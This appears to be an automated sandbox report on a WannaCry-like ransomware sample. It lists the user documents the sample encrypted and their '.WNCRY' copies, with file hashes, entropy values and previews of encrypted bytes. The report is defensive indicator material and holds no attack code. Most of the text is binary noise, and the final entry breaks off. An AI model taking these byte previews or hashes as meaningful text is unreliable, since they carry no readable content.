                                Preview:WANACRY!....N..E....hI.....E5..B ..-%..VCm.p..;.p....<...7B|N..`W g......",. O..+X.w....)..w....+..@...}..;ny.T.......8....8|A.p>..%.o..%.'...6....'..........?a...]...n.g....B.........*.6#.@.$..2iz....t...GE.~O..?.".z......I..9..!..q\.............?..b.I'.............`.}..)..R87v>..F..1n.5H..:.<.o..'LHkf.E...R...z.....]..#..ynH.[.c...c.H....e......^.J]`0GW..P...N.....G}%..F..d......Q.......fXK..#.B.-fr...1C.Z..TK...V...*...e.e.R...C.3........D+6..A...h........'mbI.P^_b.......u{!.]..c.>..-}.V..$Z..s..D.g.....Cb....y.o&....)p...h..(..g......A........2.T.2k....g.[.0..#.p...9..q.j1..+..b.n.......E..MS.....v......Z.......L..6.Z.....Gyp.L...T_...,.#7.{....e..V.....v2&.q...X4....:..2.9....6.. ...M6s..-..S..V...G...@O......C.Zx.........N..W...=.c...X9.. t.`CE.........P..s.r#.@.p&B...!.v.3.{.X...*!-...<...K..v.q.|.:.V.C!Kf8:DT6.fe.P*..O..I.lH.}<.....uq........L..d..u..zCdu.1....|......Y5A....2k.........J..'.R.o&9..<....x..3Ko.&/.l.@.."....5....T...b.".

                                C:\Users\user\Documents\BNAGMGSPLO\EFOYFBOLXA.pdf

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.806888303472629
                                Encrypted:false
                                SSDEEP:24:+gEtsguX5Q5pU3TtR5sPXUAGpgjnsxAE4A3fmEJUjA:StwQUzAUrSCAS3OeUM
                                MD5:37C12504FA4DC2380DF151BCC7C0FD83
                                SHA1:8B5B911BC075F910B5568E5B93B76A7BDD4A4CCE
                                SHA-256:979D3A15204450A33D720CC06E30C09F83D5A76BEC9B8975EFF0400368B367A5
                                SHA-512:212F20762CC43363DE0541A23F698C008DADC46C934F59432CA2605233D06B2102C6F1969401F624E2968E0E9E7AD5EA5143893DB1596B292C23F8CDE3F45211
                                Malicious:false
                                Reputation:unknown
                                Preview:?.(,%.8..Z...)A~3~C.8.?.g.s..E.......i....f.(.3...~Nf.&w..L~p..g.5.......-.[.../.......&_Q......P..sI......D...T...-...o.W.X..'o.q[.,.am.......X...a.A.....R3...j.l.6.p.Gh.0Z.b......9.#.3.C?..K.a...P.Y~.+.F.nG..TmZ...T.......:5..wo....;.k.K|by.6:....y..s,..6Q...p.Wj.B.p...!dz]...?:...@.....V2M....]A......Pu.d..S.3.B..h...w.H.%.n.QO...n..m..@...N.E........Y.9.y..4..F...:..hE9X...R.....kx..D....-..z6.U...2.S.z.....8.>......Z.....v&.]U.W-.C..h.....b].n.$r..3.2...?V.P.....X..yd..F..Z...<w.S....>G./..b+......a...'.sna(7.69.#..b.Y...A .;.c.qs....@.{..&b.....g.:..jg....j.D.9v..w..x9..3.E....A.~..$.K..!.ul....N..M...3.]2..G.BMc.XE..1.c...ZP...q..\..;.......<.&......t....re..Ad...|D..I.b.w7>j..3....2.........$.cm..."T.<..1!..d,.&...*......X..[..'.=....&!..1....~!.....64F.W...+.. <...-Da.8F.S*-....W..n.Q..o.;..x....I...%.wW>%-.T..5.y&4.o..,..t..5c&gFn.Gx...5.%.,.T..h........FC...@E./=V. ..."O.9...m..'..9 .z.P..Ig.t.XHo...G.oy.q...T.K.=E.t...kX.Y..gUK.M...)(.p....

                                C:\Users\user\Documents\BNAGMGSPLO\EFOYFBOLXA.pdf.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8407132698693625
                                Encrypted:false
                                SSDEEP:24:bkUuSUWtFZHXWPKEbLXmmujZw2yBKlY5NIsRdJgiaDKWl3PUZzvqc:bkWtTWLXmmuWWlsI7/VPURic
                                MD5:BE8FC703CF3C19E386FAB226FC9DA4CA
                                SHA1:10025B4FFD2D0AE70DAB9885F959A71891C67A58
                                SHA-256:752B060489375748A7385B224B0F9C06F695269642AE8D4AB84A4D28681C5563
                                SHA-512:FD44203447CB9613C3405CD25B3375EEF465ACDFAE87046B4C18CB996D0FBA7743E3534086761939955C558B66411CC1538C3CDB1B15D34B7791970670EC6BE4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......M...miZ9$.........}...]..^............;,I...f7....m..r.~.L....>....T..X.........;.d..E.".L...:.@u=........|!......[..<.X..$.0........;....<..O..-...9..p..R.{xo.v....\%p..F=T..k>.hI.:>.`..t-..O...i_.......>F/V.zF.< O&np...{....4.....<=.G<.7...................... .y;%... '|..h...0.}.i.C.@xoxxi.\...q.x.u....B.P.r`yRO...B...0..[%.....@.7k.hF..zD.=.4...J..k......._;..........Q.p.,D.....|NrA..v ..-...|...(....e...m.b......3..vShZ.`+.. .....k..8.z.$39...R8.?....J./....KK....y...n..c/t....'...._.........<..-.D....&..W....mY..N%..Pr./.{q....P...R.A......TQ...(N...i.E....A..f..}.8...o...z.{..g...3.<.*);. .....jh..m&...oQ.|f..?.nEwK.XV.....JXz..q..!r..J<.j........'.//kk..i...ghk....q.m........3b.BN.=5...er.iB;v._.......}.F/...R.S.....D...0...-....~-<g.(..W..h..`.y.st&j.OI9.N...._../j..9.[.s.ER.\+I....P.5.D6V..Q.J.K.+.t.....m..:.....,.|.4..$......J.p.[..J.v...53...l.......2QDY^..,~;].......h.W..{.5..E.'..D2sJ.../.......jz....L...r.

                                C:\Users\user\Documents\BNAGMGSPLO\EFOYFBOLXA.pdf.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8407132698693625
                                Encrypted:false
                                SSDEEP:24:bkUuSUWtFZHXWPKEbLXmmujZw2yBKlY5NIsRdJgiaDKWl3PUZzvqc:bkWtTWLXmmuWWlsI7/VPURic
                                MD5:BE8FC703CF3C19E386FAB226FC9DA4CA
                                SHA1:10025B4FFD2D0AE70DAB9885F959A71891C67A58
                                SHA-256:752B060489375748A7385B224B0F9C06F695269642AE8D4AB84A4D28681C5563
                                SHA-512:FD44203447CB9613C3405CD25B3375EEF465ACDFAE87046B4C18CB996D0FBA7743E3534086761939955C558B66411CC1538C3CDB1B15D34B7791970670EC6BE4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......M...miZ9$.........}...]..^............;,I...f7....m..r.~.L....>....T..X.........;.d..E.".L...:.@u=........|!......[..<.X..$.0........;....<..O..-...9..p..R.{xo.v....\%p..F=T..k>.hI.:>.`..t-..O...i_.......>F/V.zF.< O&np...{....4.....<=.G<.7...................... .y;%... '|..h...0.}.i.C.@xoxxi.\...q.x.u....B.P.r`yRO...B...0..[%.....@.7k.hF..zD.=.4...J..k......._;..........Q.p.,D.....|NrA..v ..-...|...(....e...m.b......3..vShZ.`+.. .....k..8.z.$39...R8.?....J./....KK....y...n..c/t....'...._.........<..-.D....&..W....mY..N%..Pr./.{q....P...R.A......TQ...(N...i.E....A..f..}.8...o...z.{..g...3.<.*);. .....jh..m&...oQ.|f..?.nEwK.XV.....JXz..q..!r..J<.j........'.//kk..i...ghk....q.m........3b.BN.=5...er.iB;v._.......}.F/...R.S.....D...0...-....~-<g.(..W..h..`.y.st&j.OI9.N...._../j..9.[.s.ER.\+I....P.5.D6V..Q.J.K.+.t.....m..:.....,.|.4..$......J.p.[..J.v...53...l.......2QDY^..,~;].......h.W..{.5..E.'..D2sJ.../.......jz....L...r.

                                C:\Users\user\Documents\BNAGMGSPLO\ZGGKNSUKOP.mp3

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.7890687824907205
                                Encrypted:false
                                SSDEEP:24:ClEYDtc3FsjP0ognDgAxuIRvgnthzfZgaBciLY0HHcQaFhaV:hYwEVIRq3f9jyIV
                                MD5:F7343BD5F29B8C58BCFF3E614D4D38D9
                                SHA1:829D7981456455E37F4655D40DA21351FF4F9DEB
                                SHA-256:ACB3AC32CCD3A9A8BBCCE408C0A2872647A30619FBF74CFF08526F35BC16A3D3
                                SHA-512:9167C3A6C071AA543FFC3002CB370D9595E96C648742707CEC192F6174FE09715AB9E118D6FCA6B3B7F9EB7536783B60ACD4E6AB9376FDBFDD1409AA1400D719
                                Malicious:false
                                Reputation:unknown
                                Preview:d...($..f8..|.0.......D2....^D.S.8.NL..j.V.P..@.h..vw.....m..)O&.....r...7.v..zJj..n.~<....LU.j....Z.h.H.[....M....s.C.C..'./....+:..'..)..'....JF=.+0..u1.5.U.tR....6.I..Yx1...0'.Fx.......4...Sg....EA..s..}.d.4VZz..}..*..^\5.....OY...g...kT.SJx.....H..l..0..%.6.?..Qo.qD.....x..Ro.Ni.ld:I...Zb....L'T....o.y.o...u.....>r...D.....rRQ-p..O.K..r6.@."..V</..1.)....qw.*..).1..<t/.!...9g...&....Z.8t.....a.q.&ey..C..y%...o..J1{....>.h..?&Z......W.k..............d..).TJ.L.X..I..e...1r\.A.m.".G.|(c........`c.j..y.V..aeX...?.L.mZ..U.bT\s.O..]/.*N...........NMS..!x=7l.!.~.....6....G./.........a...V....2.g.L.t...o...*.F.....!.>.^......8......d....EQ.0.x.+U!0.C.}<R.,..G.DS..{0.x..@.^5..jV......<....|...........E...o....s!s.=.@....p...s+3O'....$0..K.~..e2...3.cw+.o.1.}...Zl.R=..Y...,.....}.....%.....P...;uk.......Q.>C..~aYZ.V...S...g.....l.{.}.......k.(.ep^..Z...]..'~.9.......v..XM`..!1.4."......8.i`..q....5y.G..).u..T/...........'..nJ..;yS+

                                C:\Users\user\Documents\BNAGMGSPLO\ZGGKNSUKOP.mp3.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.832594248516997
                                Encrypted:false
                                SSDEEP:24:bkXhREAdfUiWNexUDsJ5pRd5he+/A/EE9VRV3cSn13iZpvKsZLtX/eo3aaA4d:bkXhR3cgJ3RdyAKXMSEnvV7Xmo3aahd
                                MD5:0C99AC97352908500DE12D83514C919F
                                SHA1:EAC8E50E58FFCA4EE5CE42E19FDD5DD7A9385E95
                                SHA-256:6C2B084A335F20CB4E47AD83C2783EA49255ED070AB2DCFF29F0C3800BB90077
                                SHA-512:3247A37001709D74E7D2CF864C4393E79C8994C8E70595CB8D042C6F027C564C42F848A88C1C7C3B95741594D07F32B3E412FA34DE8E81ADC32917AA8D804DA7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!........7...>}&.^.dW.8...U_9...~j...I..Zb..5.<C.+.|l....r.c.....i.=2..t.po.i..d.< ..qu.W....0.n.W.4...W}..[*......6+-....6z......C9.>.q.M.fc...h[\@...1..!...S..5.oL.......x2V.plu....~~je...k..[....L..k..#.R'*.../.......B...1]....9.....{.R..... ..............Bu{.~..2d...s....R=.X.G.n.e..q.R.....7...*Q...Mz!..B.].....O/.....H.... ..;..?[h...}OF...0M........}..O".Vh/....s.n{...iz.U_]...?.;....kD.._..)R)9..+7.P.....6S_.....M$..nr....t..t!..U.2-.l...4...K.Y~..k."i`.Q.....@....e.1.........gU...n,.._.......1........4..k.CS...Z.. ....V.....r......!.s.y.A_5.............A....N=......igH.k$..>...~..........t.w.s.n....R.....V.&..x......3..z.)..pm........v.....6.x.)%t.`.....#".=..>).0..b.VZ...g.....\J....R.Q.MI~...G..?.....).j..5....?.p..L.(O9...G.k.E.OQ..B.HU.O#T~..f......\.e^..K]iI...f.X...>R....w.{mb.T.4`.la...s.......F.6.?..S+P..:P.\)GEn..*.(e...yyy.......}/..O......1Y.O..&xqkqtx).$..yA...~XN..A...U..V.9.Z.8..e...Z.....M.$........1:....

                                C:\Users\user\Documents\BNAGMGSPLO\ZGGKNSUKOP.mp3.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.832594248516997
                                Encrypted:false
                                SSDEEP:24:bkXhREAdfUiWNexUDsJ5pRd5he+/A/EE9VRV3cSn13iZpvKsZLtX/eo3aaA4d:bkXhR3cgJ3RdyAKXMSEnvV7Xmo3aahd
                                MD5:0C99AC97352908500DE12D83514C919F
                                SHA1:EAC8E50E58FFCA4EE5CE42E19FDD5DD7A9385E95
                                SHA-256:6C2B084A335F20CB4E47AD83C2783EA49255ED070AB2DCFF29F0C3800BB90077
                                SHA-512:3247A37001709D74E7D2CF864C4393E79C8994C8E70595CB8D042C6F027C564C42F848A88C1C7C3B95741594D07F32B3E412FA34DE8E81ADC32917AA8D804DA7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!........7...>}&.^.dW.8...U_9...~j...I..Zb..5.<C.+.|l....r.c.....i.=2..t.po.i..d.< ..qu.W....0.n.W.4...W}..[*......6+-....6z......C9.>.q.M.fc...h[\@...1..!...S..5.oL.......x2V.plu....~~je...k..[....L..k..#.R'*.../.......B...1]....9.....{.R..... ..............Bu{.~..2d...s....R=.X.G.n.e..q.R.....7...*Q...Mz!..B.].....O/.....H.... ..;..?[h...}OF...0M........}..O".Vh/....s.n{...iz.U_]...?.;....kD.._..)R)9..+7.P.....6S_.....M$..nr....t..t!..U.2-.l...4...K.Y~..k."i`.Q.....@....e.1.........gU...n,.._.......1........4..k.CS...Z.. ....V.....r......!.s.y.A_5.............A....N=......igH.k$..>...~..........t.w.s.n....R.....V.&..x......3..z.)..pm........v.....6.x.)%t.`.....#".=..>).0..b.VZ...g.....\J....R.Q.MI~...G..?.....).j..5....?.p..L.(O9...G.k.E.OQ..B.HU.O#T~..f......\.e^..K]iI...f.X...>R....w.{mb.T.4`.la...s.......F.6.?..S+P..:P.\)GEn..*.(e...yyy.......}/..O......1Y.O..&xqkqtx).$..yA...~XN..A...U..V.9.Z.8..e...Z.....M.$........1:....

                                C:\Users\user\Documents\DUUDTUBZFW.png

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.7940896377629585
                                Encrypted:false
                                SSDEEP:24:m7SPT5fkKUtBHjchWPWNLy6x6sssa9GrYZvdtbuKPmWZZt5:LFkVJjchWSLPx6si95tbxP3Zn
                                MD5:B52BB4FDED782165CC64A78AD3A3DE1C
                                SHA1:5B5BFA1FC4C7FC6A7B63C4941F840F173094A71E
                                SHA-256:9C0B5EFE02A9CF581A0051685FCBE6A534F09842F7EFB180B9FD045B4D586404
                                SHA-512:9ED91EE47396989449148717F8E8E12C7B025E94C6D7CE6E31F92B8163EBD4551F67035FF2372152692ED1FFDE85B8723226F712ED66C4C242ABB74CC484C20F
                                Malicious:false
                                Reputation:unknown
                                Preview:.nH)..UA....=.W...M....W.9...#G.G.d.<lN/...Cb..5PiB.c.k...Q7..I[..{.[ .......3........7aH5...K.....2.V..j...QM.3.}.E...=)...,...)M...B?...,<....Cp.M.ttR.TN.....GE.J.......6.;..M.5Z....?Y....s...myv..Pi....X....]...L*~..jp.[w.....J.O...'..v<.2...n..U.......!5..=.h..Q...d..~...L.n.Rh!i..kgks... M..C..1..7...z.!.....}.i.f........|..f.>..N@uzP..".b..U..I.?.w..~.X+..^.wr..}s5.I..5w....t..>.....$QB....0....i..{.r*!..[.b...._>.j..".......{H.."MT,.X...cE[....[o.....C...vk^.:./..l..s.....P ...c.;o....5...E...`.Z..k..7.(@.....P.1$.....(......>..(B.#.:o....FQ.....6.3....S..s..*.+5.....}..`.c{v..tP.{........#.....&....,0_..G.??.\@.v...Z~........3h.:}u ......)>hI.}..Y.:..2..=qs:37.U...j.)3....{.._b.#..D<#.K.1ea...gk...}.v...*.&.^..a!...1.,...k.#.d...H....$.\.p..=u.X.o<.a.f0A.%.}%.O8.57....Q.~U&..C....`.........$..H..(.s~..B[q... ...h.m...5..chL.O:<aiT...].J7.Q../......5.R.<.d.....:0.~G.n......f...Q..<.....2...^..Y.kG.Ei....|?...V.....m...

                                C:\Users\user\Documents\DUUDTUBZFW.png.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.866357970534479
                                Encrypted:false
                                SSDEEP:24:bkVPd+5neiakaV6eNed+NERZQSXDZmGvATc4D1kXkVcw33b65d:bkhInetWd+MZ9TrvA4yVD3Lmd
                                MD5:35C7407FF48B2033104450BDF9E181F6
                                SHA1:A07D7EBFFC4B6BDE79D30D53CC45E4F4DA81E6BF
                                SHA-256:6844D88102015E25467C1F4A4C8278243E1D0C36357ECAD92118729D07299D9B
                                SHA-512:48BF329A1C6E872A7E4F72376A32FF8957BA586C13F4178666811AF41F150D56001EDDBB74190A82E53349EFB6CF0D1BD935441169070EDA1F7B5C5F3D5A9041
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....c.z...5.AO`..i...s...c...:V..u}:$....Z.D.#.S~z.w|.J.\.....T..........9....8.m/.....[.k7).Rx...|k:V.._....f....W........?.o...W..+V..T..ph..h........A.:..3W....D+2.q.2w..vW..qU..........W.xx<......NL....Oi....<=...>1.`.....1!.O..%.....q..#.l...............3U@+.$..%'=1..[...Z.S.....c;h`.S..-..,...........g.(.l{?#.m%../.._./.>.IgbWR.......3r.m......+.G(..MB...O.\..K...c._WN9@......V)....{....a..6..|..Y.}.[T.)...}.&f}.p......"...:./...t...........f.A....l6iQ..>)..I...Y.-...}.F-z.v...f.....b.:6..t.N.S....O..#..5N....._..]...80Xp...Uq..*_.(.U.=\.l.yp_.....(F/.C.O...T!$.DTD..Q.@s2..J...7...KO..MSZp..<B. H.n..+3...k!.k.&+.E..Z.Es...X.@]....51.=.M.....W......t...z.lY1.&...u....'..2'..=} ..zj....N.._y4.=.Ci......v......tF.v.".....(....v.c(.D.*...+...._8...C..1{..'q..[`.......f.....V..)t.j..V../M..-.?......e.4..K7........t..Nnb.x...J.GPLw..f...r.#........z.E..P9.q.8. &..G5B,.(.\....i.9..a...T.>.....u...u.....P.A.F..Oh...`...._!E.....

                                C:\Users\user\Documents\DUUDTUBZFW.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.866357970534479
                                Encrypted:false
                                SSDEEP:24:bkVPd+5neiakaV6eNed+NERZQSXDZmGvATc4D1kXkVcw33b65d:bkhInetWd+MZ9TrvA4yVD3Lmd
                                MD5:35C7407FF48B2033104450BDF9E181F6
                                SHA1:A07D7EBFFC4B6BDE79D30D53CC45E4F4DA81E6BF
                                SHA-256:6844D88102015E25467C1F4A4C8278243E1D0C36357ECAD92118729D07299D9B
                                SHA-512:48BF329A1C6E872A7E4F72376A32FF8957BA586C13F4178666811AF41F150D56001EDDBB74190A82E53349EFB6CF0D1BD935441169070EDA1F7B5C5F3D5A9041
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....c.z...5.AO`..i...s...c...:V..u}:$....Z.D.#.S~z.w|.J.\.....T..........9....8.m/.....[.k7).Rx...|k:V.._....f....W........?.o...W..+V..T..ph..h........A.:..3W....D+2.q.2w..vW..qU..........W.xx<......NL....Oi....<=...>1.`.....1!.O..%.....q..#.l...............3U@+.$..%'=1..[...Z.S.....c;h`.S..-..,...........g.(.l{?#.m%../.._./.>.IgbWR.......3r.m......+.G(..MB...O.\..K...c._WN9@......V)....{....a..6..|..Y.}.[T.)...}.&f}.p......"...:./...t...........f.A....l6iQ..>)..I...Y.-...}.F-z.v...f.....b.:6..t.N.S....O..#..5N....._..]...80Xp...Uq..*_.(.U.=\.l.yp_.....(F/.C.O...T!$.DTD..Q.@s2..J...7...KO..MSZp..<B. H.n..+3...k!.k.&+.E..Z.Es...X.@]....51.=.M.....W......t...z.lY1.&...u....'..2'..=} ..zj....N.._y4.=.Ci......v......tF.v.".....(....v.c(.D.*...+...._8...C..1{..'q..[`.......f.....V..)t.j..V../M..-.?......e.4..K7........t..Nnb.x...J.GPLw..f...r.#........z.E..P9.q.8. &..G5B,.(.\....i.9..a...T.>.....u...u.....P.A.F..Oh...`...._!E.....

                                C:\Users\user\Documents\EEGWXUHVUG.docx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.822754322988812
                                Encrypted:false
                                SSDEEP:24:0nfVXGNl54fCDKx/mEbdx+01otNOlSeugvvXrEo5J1EgHjU:g9GNUfAAmEfi3euwrF3FjU
                                MD5:36466F0FA0120C2105B14A413842D3A3
                                SHA1:D7F2DDEF5385C4FF50012063761809EC17DF7AC4
                                SHA-256:AE8F6B606CCFAF1639FE090B0B1CF08455F26276A2DE37234D7CC693D2770404
                                SHA-512:CE474408CE2B3F134147FD07B525819DD868F54071CB50A968B5EEDC9AB3E0AFA5AAB5F882E1EA3DDDA3C891B53132F9D46C27AEEA9F002CC4621765B7E2DDB0
                                Malicious:false
                                Reputation:unknown
                                Preview:p .0....mg(..g.../.....j.8..0...d. U0..../..-[y...K.!Bg.....a..A...3#Q.%,?.9x....6.5....h:L>.<..".6.#..P..Pq....c...Z..(.m..........M./......w}.uY...K.z.+&.....f....\\C#. ..W......s...vW.j#..]@..!.......i.r..+GK.P8...'v...kr..$(..)|c&.cb.r...ZFn...dT.....iV..].U...t..##.GA...".........#Uc...".....-...<.M..r..3.1u_..(A{..).....,.!.'.7.K~..M.C..v.N..?.e...u.!?.]..-)..g..... l..=;.@...?.tH.......<m....5]..>X....m..a.......B....+S.kg...*..{a...nS.*.....mJ.L...b.L.v..+.."Z.29B.vjx.|....G0.E?c.6\..$..u...4I..K7..xm.......om...TL*L...axl".z...d^sH..@.k..g..#.1...L~$..'.....m..O(.*d.&.0kX.R....*UYC...a.N..9O..&..g..@C.U.e....'... ....Qf.........\.n/.....w......F..DK|.L....;..Z.Z.'.=eT.y+..W.G\..TY#~..J.x....D..\..qT.v..F...{'..(..A....:.9..x|.6.t.....X....O.......... f7.J..R./r...g8.H..[....9.9@.b<.b...q<."...(...:..f..........h...B.m.].L..2.......z...zlk<N{...).@..7..o;.%R.HoN^...N.......J2..K...7E.E..a....x..p:..R..S..,.l.D..'..U.a.Jk...7.w..

                                C:\Users\user\Documents\EEGWXUHVUG.docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.853473127157515
                                Encrypted:false
                                SSDEEP:24:bk+5xAeXlTkpDrQIW5Thj7uPy0Ytr9GeFva1N9oSgpKpaux9AMmmeS/7w+aZ5tRE:bk+5CelQdRaThj7uq0YXGiva1fzyKpac
                                MD5:D827B86C81584B5C851D686E6647589C
                                SHA1:33EAC23B8A9AD9BB85B902304DE401ADD42BDC61
                                SHA-256:C1D51CC3BA9E343B24127D784585EF2E432EAB9EC5C49535508BF95B62B76948
                                SHA-512:4F9190E9DC05B3F8489E5F9192A866DBFD7F5347A99FB2AD325D76BE7D9DEB61D709C06D578A7E62691F3A74C95CF1653E49BAC971828DD1911D4556F6126585
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!........4....S.T.[5V....k.T_./.d.x..1.n........'.@WD...c#....W"].N?-......Lq.+.........R.3-..../c?.dt..zz....O...Pb.9P..."..)5.q...C.<.... .U.<.8.J.a....K....n.vR........n..|......%.6...[.....mg.O.....?).*.xT....+c......Q#....cO,.\..(hf.,..D..jw.K............{|...c..!x.g.....@M.[)......../p.....=....j.h..{.;..b. ..,\..*Z.W..N1B..5.. D.......>.=....6h....xw..#P..3&.c........v.E..&,.2CwY..L.S*\..fy..2Qk........K".._..G..@...{........`..lv.....$A.I.*u.....q#.lv.8...6F... .t..._...4.N2..^Q~jV..|.u,P.x.<....P.kc}..~O.W....WQ.:P..}.e...!....0.!x\.H3..{w.z.F.i.r...?_9.<....X;..|6.O.,.....I..p?..>.s..[....8@I...t.t.)3y....p.j.u ....kdb....R3hL\..........3(?}.)#.f.O..C*z0..1H...gop.J!.~.. .{\K-q.._.~.|.>X1........;..B`JVc..b....)...Y.h.)U.K(G^.....^.z.DbrnQ.,v..i...aN3........e;.........iAC.D.&./....[.5....l[.b...hs.J<........9...l.+,..<..8..o4...........Ta.h...2...;.d'.W.v.w+.j.......i.l*r..@@.$W.H.[... (.V..d.......C..E...z.x.b..

                                C:\Users\user\Documents\EEGWXUHVUG.docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.853473127157515
                                Encrypted:false
                                SSDEEP:24:bk+5xAeXlTkpDrQIW5Thj7uPy0Ytr9GeFva1N9oSgpKpaux9AMmmeS/7w+aZ5tRE:bk+5CelQdRaThj7uq0YXGiva1fzyKpac
                                MD5:D827B86C81584B5C851D686E6647589C
                                SHA1:33EAC23B8A9AD9BB85B902304DE401ADD42BDC61
                                SHA-256:C1D51CC3BA9E343B24127D784585EF2E432EAB9EC5C49535508BF95B62B76948
                                SHA-512:4F9190E9DC05B3F8489E5F9192A866DBFD7F5347A99FB2AD325D76BE7D9DEB61D709C06D578A7E62691F3A74C95CF1653E49BAC971828DD1911D4556F6126585
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!........4....S.T.[5V....k.T_./.d.x..1.n........'.@WD...c#....W"].N?-......Lq.+.........R.3-..../c?.dt..zz....O...Pb.9P..."..)5.q...C.<.... .U.<.8.J.a....K....n.vR........n..|......%.6...[.....mg.O.....?).*.xT....+c......Q#....cO,.\..(hf.,..D..jw.K............{|...c..!x.g.....@M.[)......../p.....=....j.h..{.;..b. ..,\..*Z.W..N1B..5.. D.......>.=....6h....xw..#P..3&.c........v.E..&,.2CwY..L.S*\..fy..2Qk........K".._..G..@...{........`..lv.....$A.I.*u.....q#.lv.8...6F... .t..._...4.N2..^Q~jV..|.u,P.x.<....P.kc}..~O.W....WQ.:P..}.e...!....0.!x\.H3..{w.z.F.i.r...?_9.<....X;..|6.O.,.....I..p?..>.s..[....8@I...t.t.)3y....p.j.u ....kdb....R3hL\..........3(?}.)#.f.O..C*z0..1H...gop.J!.~.. .{\K-q.._.~.|.>X1........;..B`JVc..b....)...Y.h.)U.K(G^.....^.z.DbrnQ.,v..i...aN3........e;.........iAC.D.&./....[.5....l[.b...hs.J<........9...l.+,..<..8..o4...........Ta.h...2...;.d'.W.v.w+.j.......i.l*r..@@.$W.H.[... (.V..d.......C..E...z.x.b..

                                C:\Users\user\Documents\EEGWXUHVUG.jpg

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.79990850733804
                                Encrypted:false
                                SSDEEP:12:fOli7oYF+J9k3/EeO4Ux92VgqIkD/DNKHTfUrtT//O/ifk99p9kCnWpPWNblYO9X:vgJUUx92V9x7NYfUr5E9LxnIPO+cogLP
                                MD5:14D3AD8D0532D8AD5A9CD3EF40D19859
                                SHA1:4B6180A428665011F6DBFBAA6879744FBEF3C62A
                                SHA-256:B4510AC19BB462F42F262C7F242291C47E6A953340DC886DD2B55D08AF6C928C
                                SHA-512:A13E313051DA3D8CD3D84C9114127BDD730A6702C3430D1ABBAD79B37CF7C358979FD33A89FFF4D5F48CDF05A5310CE0FFBDF50F6C00AD3AD32E654284BAFF42
                                Malicious:false
                                Reputation:unknown
                                Preview:...B..._..$./.S....F....P.(.].ZZ,K!.f,.......h..q~..yS.........>..../c B.d.....|.2..L..F...S+..K!l.......%...........K.i.9E.f..X..Q!....?&Z..=...S./..........V.G.4..].99rfUx...ZH..$...b.X>i..(IJ...[......ax...cw.1..v.zT1...S...>\.....Y.. W5x.f..c'b..k...F\...^k!..Nc..P.~U\&....E....r.....:na....G......}..l.{X...b.m..:.B.f...;{....Y_i$r....gT.\k`...t..[.b..I5...g:v..n.X:.v.F..P..?W......3Q8s..>oF....u.x....q[H'.u.Y...e..Iv../`...E... ...5....|..lW0..=e.z.,...=....(|.#.^...Yjj~.m.S.8.+zb!(...^......i3......D$D..='M..!vX<.l^..K. .`.m..{<...\8....8<Q.*.Et.....]......CVTxU1a.Bkx^..(...dK#E.........N.i...2Fvg..I.1.9A .E.MwS.$M.g....c.U....JU.....y.P...^.[..G....He.o......v..8..{...Z._...|B....e..W......t...4.#!e:l.bcU.qV_.......%.IDT&..g.#...[@H..N._..y.(...hpMZ..b.2.. sBG...wQw.yF-.w..+:..+ss5.cp....)^t...j.N[......CD..4..i...bp..}:..P....._x...m...l.^E.:.3}e5.............t..p5.+t..vX%8..L......b..O.O..{W..2<N..~..Y.......z ...A.,.r.Z.(.U.

                                C:\Users\user\Documents\EEGWXUHVUG.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843799295141846
                                Encrypted:false
                                SSDEEP:24:bkRXx+L8gHM25zoCFWSB15pCC+k+eXIOmL24MKTujDayP0Mo4jhb9:bkRhEX57FRnmC+kBXIOQN4ay8yVR
                                MD5:D7E53D0AE1F9854CD21BF18F8045DA00
                                SHA1:A64FD086D79CB1FA56138D132E9F59C6E1EA2F48
                                SHA-256:B4B07CF1D1AF2A6DA954180D33C31420ABAC5B70FA6301E4FFD33519FFE6AB27
